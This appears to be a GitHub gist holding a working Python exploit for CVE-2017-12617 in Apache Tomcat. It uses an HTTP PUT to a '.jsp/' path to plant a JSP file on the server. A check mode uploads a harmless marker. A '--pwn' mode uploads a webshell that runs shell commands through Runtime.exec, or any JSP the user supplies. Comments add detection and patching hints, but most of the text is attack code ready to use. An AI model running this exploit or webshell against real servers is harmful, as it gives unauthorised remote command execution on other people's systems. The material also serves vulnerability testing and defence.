
@frankli0324
Created December 10, 2019 02:46
import requests
import os
from argparse import ArgumentParser, FileType
# Text printed once at start-up by the command-line block; the leading
# newline of the triple-quoted literal is stripped.
banner = """
CVE-2017-12617
Frank
""".lstrip('\n')
# Harmless JSP marker used by the check: it only prints the literal word
# "content". The command-line block uploads it and then looks for that word
# in the GET response, i.e. it tests whether the server executed the
# uploaded JSP rather than merely storing it.
pin = '<% out.println("content");%>'
# Default JSP body uploaded in --pwn mode (replaced by the -f file when one
# is given). It runs `bash -c whoami` through Runtime.exec, collects the
# command's stdout line by line, and renders it inside a <pre> element.
# Defender note: the request this script generates is an HTTP PUT to a path
# ending in ".jsp/" that the server answers with 201; that pair is what to
# search for in Tomcat access logs.
payload = """
<%@ page import="java.io.*" %>
<%
String output = "";
String s = null;
try {
Process p = Runtime.getRuntime().exec(new String[]{
"bash", "-c", "whoami"
});
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"\\n"; }
} catch(IOException e) { e.printStackTrace(); }
%>
<pre><%=output %></pre>"""
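def upload_payload(url, payload):
    """PUT *payload* to *url* and report whether the server created it.

    The URL is normalised to end in exactly one trailing slash before the
    request is sent. The body is the UTF-8 encoding of *payload*.

    Returns True only when the server answers 201 (Created); any other
    status, or a transport failure, yields False. A 201 here means the
    server accepted an unauthenticated write, which on Tomcat requires the
    default servlet's ``readonly`` init parameter to have been set to
    false. Keeping ``readonly`` at its default of true and running a
    patched Tomcat release closes this path.
    """
    url = url.rstrip('/') + '/'
    try:
        # A timeout keeps the call from hanging forever on a silent host.
        response = requests.put(
            url, data=payload.encode('utf-8'), timeout=10
        )
    except requests.RequestException:
        # Only network/HTTP-layer failures are treated as "unreachable";
        # the original bare `except:` also swallowed KeyboardInterrupt and
        # programming errors.
        print('unable to reach target: ', url)
        return False
    return response.status_code == 201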
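if __name__ == '__main__':
    # Command-line entry point.
    #   -u URL        base URL of the Tomcat instance (required)
    #   -p            upload the JSP payload instead of only checking
    #   -f FILE       with -p, upload FILE's contents instead of the
    #                 built-in payload
    parse = ArgumentParser()
    parse.add_argument("-u", "--url", dest="target", type=str,
                       help="set target url", required=True)
    parse.add_argument("-p", "--pwn", dest="pwn", action='store_true',
                       help="generate webshell and upload it")
    parse.add_argument("-f", "--file", dest="file", type=FileType('r'))
    opt = parse.parse_args()

    # Strip a trailing slash (the original used lstrip, which left it in
    # place and produced "//upload.jsp/" for URLs ending in "/").
    target = opt.target.rstrip('/') + '/upload.jsp/'
    print(banner)

    # `store_true` makes opt.pwn False or True, never None. The original
    # compared it with None, so the check-only branch was unreachable and
    # the command-executing payload was uploaded even without -p.
    if not opt.pwn:
        # Check only: upload the harmless marker page and see whether the
        # server executes it. NOTE: the marker file stays on the server
        # after the check and has to be removed from the webapp directory
        # by hand.
        try:
            vulnerable = (
                upload_payload(target, pin)
                and 'content' in requests.get(target, timeout=10).text
            )
        except requests.RequestException:
            vulnerable = False
        if vulnerable:
            print('Target is Vulnerable to CVE-2017-12617')
        else:
            print('Not Vulnerable to CVE-2017-12617 ')
    else:
        if opt.file is not None:
            try:
                payload = opt.file.read()
                print('Using', opt.file.name, 'as payload')
            except (OSError, UnicodeDecodeError) as err:
                # Keep the original fallback to the built-in payload, but
                # say so instead of failing silently.
                print('Could not read', opt.file.name,
                      '- using built-in payload:', err)
        print("Uploading File .....")
        upload_payload(target, payload)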